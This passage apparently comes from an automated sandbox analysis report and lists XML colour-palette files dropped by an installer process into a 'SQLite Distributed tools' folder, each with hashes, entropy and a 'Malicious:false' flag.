                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Caramel" >. <Color colorName="#303030" alpha="255" />. <Color colorName="#a488c0" alpha="255" />. <Color colorName="#ac8cc0" alpha="255" />. <Color colorName="#b490c0" alpha="255" />. <Color colorName="#bc94c0" alpha="255" />. <Color colorName="#c498c0" alpha="255" />. <Color colorName="#cc98c0" alpha="255" />. <Color colorName="#d49cc0" alpha="255" />. <Color colorName="#dca0c0" alpha="255" />. <Color colorName="#e4a4c0" alpha="255" />. <Color colorName="#eca8c0" alpha="255" />. <Color colorName="#e4a0bc" alpha="255" />. <Color colorName="#d894b8" alpha="255" />. <Color colorName="#cc88b4" alpha="255" />. <Color colorName="#c07cb0" alpha="255" />. <Color colorName="#b470a8" alpha="255" />. <Color colorName="#a868a4" alpha="255" />. <Color colorName="#9c5ca0" alpha="255" />. <Color colorName="#90509c" alpha="255" />. <Color colorName="#844498" alpha="255" />. <Color colorName="#783890" alpha="255" />. <Color colorNa
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-KHPNS.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1314
                                                                  Entropy (8bit):4.6653491766348525
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8NpYqb/0SiKUiqiqiNfqL+qho4IzstDqogIAzWqFIX++h+qqqG0+c:c8PhzXYFZ
                                                                  MD5:9009A9ECEE84A2F8EA78B8A194C87E51
                                                                  SHA1:3660EF6B1C73BB81C3E702D2B30962B7D994EF8C
                                                                  SHA-256:129094037FA5C000FD761FBD13B3F5E71B4A9E5AB7167D529D6C7DF06AD2ADF7
                                                                  SHA-512:D545702AB06DCDD4349F24382C3BB874BCA67816212F74A1444510472547E8B0A47AEAF999166257113330EFC004189905AF0A4523E7193FB26F9B81D0E1752F
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Tango Icon Theme Palette" >. <Color colorName="#fce94f" alpha="255" />. <Color colorName="#edd400" alpha="255" />. <Color colorName="#c4a000" alpha="255" />. <Color colorName="#8ae234" alpha="255" />. <Color colorName="#73d216" alpha="255" />. <Color colorName="#4e9a06" alpha="255" />. <Color colorName="#fcaf3e" alpha="255" />. <Color colorName="#f57900" alpha="255" />. <Color colorName="#ce5c00" alpha="255" />. <Color colorName="#729fcf" alpha="255" />. <Color colorName="#3465a4" alpha="255" />. <Color colorName="#204a87" alpha="255" />. <Color colorName="#ad7fa8" alpha="255" />. <Color colorName="#75507b" alpha="255" />. <Color colorName="#5c3566" alpha="255" />. <Color colorName="#e9b96e" alpha="255" />. <Color colorName="#c17d11" alpha="255" />. <Color colorName="#8f5902" alpha="255" />. <Color colorName="#ef2929" alpha="255" />. <Color colorName="#cc0000" alpha="255" />. <Color colorName="#a40000" alpha="255" /
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-KPQTE.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11099
                                                                  Entropy (8bit):4.513677329893502
                                                                  Encrypted:false
                                                                  SSDEEP:96:9oimmq++ZthhNiu37RQBBhhlew/gugug5lkXddgptttI:9Y7RQBBhhD//Sk40
                                                                  MD5:29A8B7BD0D763691535158B4E6901082
                                                                  SHA1:9411117C64A9E9226A6CF7C5CFC4AF47130C8BBB
                                                                  SHA-256:28CC002FBBDC1C9F642ACD5833006971129224474D281B215EBA84D8057F0E17
                                                                  SHA-512:504C2DFA593F4F883A60B6459CBA1073DB9DE6D99CBD8CD2E6F8FAB8316D17A1A38C3F5DB84ABE7B68612F665A5F92B7BD603F2FF6CEF2C189FBEA9BAE00FF16
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Khaki" >. <Color colorName="#90846c" alpha="255" />. <Color colorName="#908470" alpha="255" />. <Color colorName="#908470" alpha="255" />. <Color colorName="#908474" alpha="255" />. <Color colorName="#908874" alpha="255" />. <Color colorName="#908878" alpha="255" />. <Color colorName="#908878" alpha="255" />. <Color colorName="#908c78" alpha="255" />. <Color colorName="#908c7c" alpha="255" />. <Color colorName="#908c7c" alpha="255" />. <Color colorName="#908c80" alpha="255" />. <Color colorName="#909080" alpha="255" />. <Color colorName="#909084" alpha="255" />. <Color colorName="#909084" alpha="255" />. <Color colorName="#909088" alpha="255" />. <Color colorName="#909488" alpha="255" />. <Color colorName="#909488" alpha="255" />. <Color colorName="#90948c" alpha="255" />. <Color colorName="#90988c" alpha="255" />. <Color colorName="#909890" alpha="255" />. <Color colorName="#909890" alpha="255" />. <Color colorName
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-LA699.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11099
                                                                  Entropy (8bit):4.5265983006249755
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8gbwlDXvaQQeF22AYYsedAEtEg8BcNU1NlEaQSUw+NshgrZlUgR5sllld:9gbwlDXvaQQ1YYsedxtV9Gg3US5sllld
                                                                  MD5:9C972C9AA55CBCDCF7CD2522ED4609E8
                                                                  SHA1:D2F7476D43F6F0CAF3799EBF3B958B2D243F5A31
                                                                  SHA-256:72B0E735D58DA4792F5C4750B720B656459C227ACCE37D009E434792A6BF4B2E
                                                                  SHA-512:C8535C6ED2F793F1114D67C19A0C8CA36D83F6EF4DDB4E87BC808E55B57F5FA76D292D518156A7A85606EAB516C1EB9E3909EDEE0F9938670CD26935EE1DE2B0
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Royal" >. <Color colorName="#000000" alpha="255" />. <Color colorName="#3c0050" alpha="255" />. <Color colorName="#3c0050" alpha="255" />. <Color colorName="#3c0054" alpha="255" />. <Color colorName="#400054" alpha="255" />. <Color colorName="#400054" alpha="255" />. <Color colorName="#400058" alpha="255" />. <Color colorName="#400058" alpha="255" />. <Color colorName="#440058" alpha="255" />. <Color colorName="#44005c" alpha="255" />. <Color colorName="#44005c" alpha="255" />. <Color colorName="#44005c" alpha="255" />. <Color colorName="#480060" alpha="255" />. <Color colorName="#480060" alpha="255" />. <Color colorName="#480060" alpha="255" />. <Color colorName="#480064" alpha="255" />. <Color colorName="#4c0064" alpha="255" />. <Color colorName="#4c0064" alpha="255" />. <Color colorName="#4c0068" alpha="255" />. <Color colorName="#4c0068" alpha="255" />. <Color colorName="#4c0068" alpha="255" />. <Color colorName
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-LCOF4.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):351
                                                                  Entropy (8bit):4.805216860983938
                                                                  Encrypted:false
                                                                  SSDEEP:6:TMVBd/kdS0v6GleDeEJhnFGleTwnFGle+TnFGlerQnFGleDIanFGleDeEJhnhRmb:TMHd8d/e9gesge+TgerQgebge9hqn
                                                                  MD5:9CC309775A5BB248D84E789BFAA2286D
                                                                  SHA1:57C380F3BB1B97AC850CF43C36ED72EFFFE050F5
                                                                  SHA-256:F2275D7160F636C23AD5B971A6AE6258EEB4F34055FB28FC33CFDBFD51C0EEB0
                                                                  SHA-512:0C868FA28CAB6DD76ABA352F3F1E38B1BC7A82115E2651825813206034F9637A8B3660FFF1FB732F60705D7D843AB483B2655E7505D245113C4A33C3BC434C11
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Toonka" >. <Color colorName="#f8952c" alpha="255" />. <Color colorName="#e68728" alpha="255" />. <Color colorName="#c27222" alpha="255" />. <Color colorName="#a25f1c" alpha="255" />. <Color colorName="#8d5318" alpha="255" />. <Color colorName="#f8952c" alpha="255" />.</Palette>..
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-M4D4A.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11099
                                                                  Entropy (8bit):4.5436058428416395
                                                                  Encrypted:false
                                                                  SSDEEP:96:91wuESUTQNNNNttK444Ut7Ou8saS4pvSsLDGxOW:91wGf07WSLR
                                                                  MD5:293CEE28AA8E6D993D1302ACE9370E38
                                                                  SHA1:0D02602435FB8C4AD1CF48FBF179B26186505F6B
                                                                  SHA-256:2ACE81250383F6E244713D2F318570AA28871CF70D076428D80BA6627139E046
                                                                  SHA-512:EAD9F4F61E8E62A04E235EE948B130E68B4EF7FE7287C24D3D596213A72B9CB828D21150926B3FF3376C21E7F13E0E2D1248A971079356F70B42BFFBCC66A2F4
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="China" >. <Color colorName="#e04cf0" alpha="255" />. <Color colorName="#e04cf0" alpha="255" />. <Color colorName="#e050f0" alpha="255" />. <Color colorName="#e054f0" alpha="255" />. <Color colorName="#e458f0" alpha="255" />. <Color colorName="#e45cf0" alpha="255" />. <Color colorName="#e460f0" alpha="255" />. <Color colorName="#e460f0" alpha="255" />. <Color colorName="#e464f0" alpha="255" />. <Color colorName="#e468f0" alpha="255" />. <Color colorName="#e46cf0" alpha="255" />. <Color colorName="#e870f0" alpha="255" />. <Color colorName="#e874f0" alpha="255" />. <Color colorName="#e878f0" alpha="255" />. <Color colorName="#e878f0" alpha="255" />. <Color colorName="#e87cf0" alpha="255" />. <Color colorName="#e880f0" alpha="255" />. <Color colorName="#e884f0" alpha="255" />. <Color colorName="#e888f0" alpha="255" />. <Color colorName="#ec8cf0" alpha="255" />. <Color colorName="#ec8cf0" alpha="255" />. <Color colorName
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-ND3NV.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11102
                                                                  Entropy (8bit):4.466369461275854
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8gGTMs3/4+plYPFawx9VXDZZZZ5MwUUQwalbaN:9fl3/4+p+PFawx9FZZZZ5t
                                                                  MD5:0B35D57AB8DF8F1D8E5C76CF9293F427
                                                                  SHA1:AEC01875BBAA8EBBE7A8EE7AA49B694A4B21AA4B
                                                                  SHA-256:1F6E201FB810FB2860A5E39ECE07344BAABA0BF8D79F597D3026B5E716716B0E
                                                                  SHA-512:648817DCE5E9721BFC6082AA6E72E830D4F4CDECA35299577B10A30A230A0500A4122C306ABACA018B22E09C2B11B9DCFC192AFC74306B05976AA0CBB4865125
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Firecode" >. <Color colorName="#000000" alpha="255" />. <Color colorName="#000018" alpha="255" />. <Color colorName="#000018" alpha="255" />. <Color colorName="#00001c" alpha="255" />. <Color colorName="#000020" alpha="255" />. <Color colorName="#000020" alpha="255" />. <Color colorName="#000024" alpha="255" />. <Color colorName="#000028" alpha="255" />. <Color colorName="#080028" alpha="255" />. <Color colorName="#100024" alpha="255" />. <Color colorName="#180024" alpha="255" />. <Color colorName="#200020" alpha="255" />. <Color colorName="#28001c" alpha="255" />. <Color colorName="#30001c" alpha="255" />. <Color colorName="#380018" alpha="255" />. <Color colorName="#400014" alpha="255" />. <Color colorName="#480014" alpha="255" />. <Color colorName="#500010" alpha="255" />. <Color colorName="#580010" alpha="255" />. <Color colorName="#60000c" alpha="255" />. <Color colorName="#680008" alpha="255" />. <Color colorN
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-OP0S9.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11099
                                                                  Entropy (8bit):4.4630297261884495
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8KYpiwnllJoOTcXE9REjvyyvcr1KnlKZ:9KYpdltkRjZ/lKZ
                                                                  MD5:4E921EE57C9BD403B003398CF48BD626
                                                                  SHA1:7FD6B75A53D5441F3EFA68BDD584376062CA4AD6
                                                                  SHA-256:F41D714E0FE850DA0FD4CE191189D052A81AF89D4BB00A3D2E8565EA74AAE371
                                                                  SHA-512:5C32355D3997F5E1B246DC46B658239512E29282E367828E5D62DB72ED6616EEA29A943253DBCB1486CB8A1849CFECBE3BA88209620A0A819A378AADD9C26B51
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Blues" >. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000004" alpha="255" />. <Color colorName="#00000c" alpha="255" />. <Color colorName="#000010" alpha="255" />. <Color colorName="#000018" alpha="255" />. <Color colorName="#000020" alpha="255" />. <Color colorName="#000024" alpha="255" />. <Color colorName="#00002c" alpha="255" />. <Color colorName="#000030" alpha="255" />. <Color colorName="#000038" alpha="255" />. <Color colorName="#000040" alpha="255" />. <Color colorName="#000044" alpha="255" />. <Color colorName="#00004c" alpha="255" />. <Color colorName="#000050" alpha="255" />. <Color colorName="#000058" alpha="255" />. <Color colorName="#000060" alpha="255" />. <Color colorName="#000064" alpha="255" />. <Color colorName="#00006c" alpha="255" />. <Color colorName="#000074" alpha="255" />. <Color colorName="#000078" alpha="255" />. <Color colorName
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-P53KA.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11101
                                                                  Entropy (8bit):4.542203244391445
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8w3ZxjRhlnXqyDdt3alSyqqJmU03jtv0LZEEd6b0Hs62OfEiXkWOisqXa:9sZxRXq6de1wt7EEIHs6rfExWOYXa
                                                                  MD5:1711FC04ABAD15A9A3FD30B10088EB53
                                                                  SHA1:53E11FD716CE8C00D16B8F3381FD7B240A0AF71B
                                                                  SHA-256:5502DA0B916AF88B80F385F2057E356C32194DA32D953B19BEF64BAC76388195
                                                                  SHA-512:E5D5F19CF7F4E4F94EEFEB17B5CA60093388FF6A80BE6843C8A5DDC144F7B00CA5D4EDE67352105FACCE25E30D179070BC4E582A9777C4E81E6B0E660A7C6F45
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Borders" >. <Color colorName="#cc34b4" alpha="255" />. <Color colorName="#cc34b4" alpha="255" />. <Color colorName="#cc34b8" alpha="255" />. <Color colorName="#cc30bc" alpha="255" />. <Color colorName="#c830c0" alpha="255" />. <Color colorName="#c82cc8" alpha="255" />. <Color colorName="#c82ccc" alpha="255" />. <Color colorName="#c428d0" alpha="255" />. <Color colorName="#c428d4" alpha="255" />. <Color colorName="#c424dc" alpha="255" />. <Color colorName="#c024e0" alpha="255" />. <Color colorName="#c020e4" alpha="255" />. <Color colorName="#c020e8" alpha="255" />. <Color colorName="#bc1cf0" alpha="255" />. <Color colorName="#bc1cf4" alpha="255" />. <Color colorName="#bc18f8" alpha="255" />. <Color colorName="#bc18fc" alpha="255" />. <Color colorName="#c01cf8" alpha="255" />. <Color colorName="#c020f8" alpha="255" />. <Color colorName="#c424f8" alpha="255" />. <Color colorName="#c428f4" alpha="255" />. <Color colorNa
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-QKQI7.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11099
                                                                  Entropy (8bit):4.525242770237429
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8R6ALzPEU4Hfqlxwmto4w42QJWKmmeGGZZEpppNNNDDkkLfa5CCm77XsgccO:9P/LPo4w42xGGZZBCCm77Xe
                                                                  MD5:C1BDBEE2E4B85CA754FBCE971CAA545C
                                                                  SHA1:454EA1B4AF7C2BF4CB91E72913DC1CD8786F8332
                                                                  SHA-256:DFB51545B6D7DA255CF43D873F91F112E12533C75F3A8571F9E49DB2B5F1A22B
                                                                  SHA-512:43D7113BF5AD8AEF5F223780D8FFE3A96C77C73EAC41AA2C1BD7FC160118BFA51049BF108768FCE85062B0038471D17CB9B5FFA1106F200C4AAF2596C5B1461E
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="News3" >. <Color colorName="#ece804" alpha="255" />. <Color colorName="#ece804" alpha="255" />. <Color colorName="#e8e804" alpha="255" />. <Color colorName="#e4e804" alpha="255" />. <Color colorName="#e4e804" alpha="255" />. <Color colorName="#e0e804" alpha="255" />. <Color colorName="#dce804" alpha="255" />. <Color colorName="#dce804" alpha="255" />. <Color colorName="#d8e804" alpha="255" />. <Color colorName="#d4e404" alpha="255" />. <Color colorName="#d4e404" alpha="255" />. <Color colorName="#d0e404" alpha="255" />. <Color colorName="#cce404" alpha="255" />. <Color colorName="#cce404" alpha="255" />. <Color colorName="#c8e404" alpha="255" />. <Color colorName="#c4e404" alpha="255" />. <Color colorName="#c4e404" alpha="255" />. <Color colorName="#c0e404" alpha="255" />. <Color colorName="#bce404" alpha="255" />. <Color colorName="#bce404" alpha="255" />. <Color colorName="#b8e404" alpha="255" />. <Color colorName
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-S9LIJ.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):867
                                                                  Entropy (8bit):4.693271903927657
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8dZIw+0aPqti0iSXBXWiq4S9nq4qDqVkq8:c8IH+0eZ
                                                                  MD5:812CCBB546D84A825BCD8A903F7E980F
                                                                  SHA1:38B8C6B6B7FA175E55ED32AD03A1FEA3449D2036
                                                                  SHA-256:7FCDF8AC5B6EA3899330DCF389602C60A83FBAF33AC3B9B370837DCFD74C7417
                                                                  SHA-512:74B7026FFB76DF82026799E054E963750904E1E6DFD6AAEF543B04E7C80C9A08C6C2913FABEF89E076EFE406AEB2E2E1926D63C2EB00115722997B09D3131297
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Pastels" >. <Color colorName="#e29191" alpha="255" />. <Color colorName="#99dd92" alpha="255" />. <Color colorName="#93d8b9" alpha="255" />. <Color colorName="#94c4d3" alpha="255" />. <Color colorName="#949ace" alpha="255" />. <Color colorName="#b394cc" alpha="255" />. <Color colorName="#cc96b1" alpha="255" />. <Color colorName="#cca499" alpha="255" />. <Color colorName="#dfe592" alpha="255" />. <Color colorName="#ffa560" alpha="255" />. <Color colorName="#6bff63" alpha="255" />. <Color colorName="#65ffcc" alpha="255" />. <Color colorName="#65c4ff" alpha="255" />. <Color colorName="#656bff" alpha="255" />. <Color colorName="#ad65ff" alpha="255" />. <Color colorName="#ff65f4" alpha="255" />. <Color colorName="#ff6584" alpha="255" />. <Color colorName="#ff6565" alpha="255" />.</Palette>.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-SABJD.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11100
                                                                  Entropy (8bit):4.534046987862113
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8vfUU/0BcGGLn3aXqtgbH7t0JTJ7F5BBSOihj7XP6PWUfIzzB//q3r:9vPGGLKXogeFK7XiB3r
                                                                  MD5:B4D3F6AFE3D6B208E889C165358FDFCC
                                                                  SHA1:43A63F43BF3BD0D97A3ABFE0BF9D7930B5AFF6D6
                                                                  SHA-256:611A50A838237E67ED3C842B5B1F70D0634AFA44ED1F805B24CF455B137028DC
                                                                  SHA-512:9810808FAC6C565D3F9F9D2118B3AC41927B37FCCA73AB0392CDCBFF3A8BE9AAE59DC0F0DFDEFCDFB9CB41DE1D85D473FB25DE33DD7F66F245CE00879DFE4088
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Hilite" >. <Color colorName="#a490b4" alpha="255" />. <Color colorName="#a090b4" alpha="255" />. <Color colorName="#a090b4" alpha="255" />. <Color colorName="#a090b0" alpha="255" />. <Color colorName="#a090b0" alpha="255" />. <Color colorName="#a08cac" alpha="255" />. <Color colorName="#a08cac" alpha="255" />. <Color colorName="#a08ca8" alpha="255" />. <Color colorName="#a08ca8" alpha="255" />. <Color colorName="#a08ca8" alpha="255" />. <Color colorName="#a08ca4" alpha="255" />. <Color colorName="#a088a4" alpha="255" />. <Color colorName="#9c88a0" alpha="255" />. <Color colorName="#9c88a0" alpha="255" />. <Color colorName="#9c889c" alpha="255" />. <Color colorName="#9c889c" alpha="255" />. <Color colorName="#9c889c" alpha="255" />. <Color colorName="#9c8498" alpha="255" />. <Color colorName="#9c8498" alpha="255" />. <Color colorName="#9c8494" alpha="255" />. <Color colorName="#9c8494" alpha="255" />. <Color colorNam
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-SE1CR.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11097
                                                                  Entropy (8bit):4.51830491223736
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8nPbv9sGIsQWYkqvQxxNHDuTjtXkxx/iiiiwllEFv:95sGI1gxNHDaqxxX
                                                                  MD5:88B9A72327B3FA17D22F07E3B20E2F5E
                                                                  SHA1:5BB1B7AED17138A16B4525F443950692FD6B47E9
                                                                  SHA-256:64F8C11A78E39EE0C8120E1EFD11332CF0841039556DD34D4661892C4B15EBE3
                                                                  SHA-512:13AAAB9D21234886C29FD62060C37B80DCE1D6CBDC6C4A6AD19C5BFC3C53EC10A4A61D4C002B31B37A9BDBAF1AB9823123D3EB38967046E0AAE8667733B3124D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Op2" >. <Color colorName="#cc9064" alpha="255" />. <Color colorName="#cc9064" alpha="255" />. <Color colorName="#c89468" alpha="255" />. <Color colorName="#c8986c" alpha="255" />. <Color colorName="#c89870" alpha="255" />. <Color colorName="#c49c74" alpha="255" />. <Color colorName="#c4a078" alpha="255" />. <Color colorName="#c0a47c" alpha="255" />. <Color colorName="#acd4b4" alpha="255" />. <Color colorName="#c0a880" alpha="255" />. <Color colorName="#c0ac84" alpha="255" />. <Color colorName="#bcb088" alpha="255" />. <Color colorName="#bcb48c" alpha="255" />. <Color colorName="#b8b890" alpha="255" />. <Color colorName="#b8b894" alpha="255" />. <Color colorName="#b4bc98" alpha="255" />. <Color colorName="#b4c09c" alpha="255" />. <Color colorName="#b4c4a0" alpha="255" />. <Color colorName="#b0c8a4" alpha="255" />. <Color colorName="#b0cca8" alpha="255" />. <Color colorName="#acd0ac" alpha="255" />. <Color colorName="
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-SHEBO.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11099
                                                                  Entropy (8bit):4.521039979356267
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8YDwylbCBB7FxS8vHK+7GrkeyL2eJc6zgqkT3ruyS0OB:9YVuBT9v1SrsLJJc6zgnT3ruyBq
                                                                  MD5:1DC710129081EC71B533232C139DA1E6
                                                                  SHA1:E6D91A05D7E09F4BFBFD5B6E74CB913FC8237B12
                                                                  SHA-256:5A428D282087283879837AE7ACEEDF5440B543B0A1A1453C5F00B0B7819CC1BC
                                                                  SHA-512:9E20FD606C2F8DA629964E6E8900C79194247D3E3AF97273301C2054B34119C17D702C2692645EE353052D43C0E5ABF467B7006F4952A483225CD812D42B3BD7
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Bears" >. <Color colorName="#080808" alpha="255" />. <Color colorName="#442c2c" alpha="255" />. <Color colorName="#50080c" alpha="255" />. <Color colorName="#483838" alpha="255" />. <Color colorName="#685444" alpha="255" />. <Color colorName="#746050" alpha="255" />. <Color colorName="#54382c" alpha="255" />. <Color colorName="#8c6858" alpha="255" />. <Color colorName="#ac745c" alpha="255" />. <Color colorName="#442c38" alpha="255" />. <Color colorName="#584844" alpha="255" />. <Color colorName="#70544c" alpha="255" />. <Color colorName="#08081c" alpha="255" />. <Color colorName="#686054" alpha="255" />. <Color colorName="#807460" alpha="255" />. <Color colorName="#a48868" alpha="255" />. <Color colorName="#787474" alpha="255" />. <Color colorName="#88806c" alpha="255" />. <Color colorName="#cca070" alpha="255" />. <Color colorName="#dcb87c" alpha="255" />. <Color colorName="#68646c" alpha="255" />. <Color colorName
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-SHINJ.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11104
                                                                  Entropy (8bit):4.5402144827643705
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8uSLtvw3VcClq4m24gygvJWb4qNWmk+sH5mlg3nwntPmYYOjOrG1UpM:9jvwlcClqMgoZmwnUQlOjOrG1UpM
                                                                  MD5:E1C4FC5A5F9CF9AE8505662465102BF0
                                                                  SHA1:545CDE2EEEDF122AA4F48C72A583207AD6E7431E
                                                                  SHA-256:6EAE7D2BF9A9407D53425DE940A727A0E0E2F79C5D445A7FAF71BA1853ED1A06
                                                                  SHA-512:2FA2F41AE044AEEEA2D4B1CAADD9696B043C4EDC571A0EF719A46DEF78022EFAFA3BA485CD0BF6BA1D4897AAD13583A6C4A8B9BFC2342AA20D6F00DF5AF227B7
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="GrayViolet" >. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#040404" alpha="255" />. <Color colorName="#040404" alpha="255" />. <Color colorName="#080808" alpha="255" />. <Color colorName="#080808" alpha="255" />. <Color colorName="#0c0c0c" alpha="255" />. <Color colorName="#0c0c0c" alpha="255" />. <Color colorName="#101010" alpha="255" />. <Color colorName="#101010" alpha="255" />. <Color colorName="#141414" alpha="255" />. <Color colorName="#141414" alpha="255" />. <Color colorName="#141818" alpha="255" />. <Color colorName="#181818" alpha="255" />. <Color colorName="#181c1c" alpha="255" />. <Color colorName="#1c1c1c" alpha="255" />. <Color colorName="#1c2020" alpha="255" />. <Color colorName="#202020" alpha="255" />. <Color colorName="#202024" alpha="255" />. <Color colorName="#242424" alpha="255" />. <Color colorName="#242428" alpha="255" />. <Color colo
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-TV5JP.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11102
                                                                  Entropy (8bit):4.522402394593415
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8mvK/6xwQZEl9m4vkUYQHHqmu4KK22UldeaHN:9adxovkU9HY
                                                                  MD5:D448BB01E8902429F2BEF222C53D28A0
                                                                  SHA1:07453AEE1FA4B522AD9BCA7B0E2FC4A1518E5EEF
                                                                  SHA-256:10C7AAC4EAB5958928539E841A1842BEA8BA8209D5EA0B174F384CB23BB7E714
                                                                  SHA-512:83C09B8A1A71B5BC7FE0B32A73110CFD8D0D72F72D5047BAEDF2C4C93F91205FCCA5A99446D5366527755FC02DADBDCC59B2DC1275B6A2D511D348716B5D4C2D
                                                                  Malicious:false
                                                                  Reputation:unknown
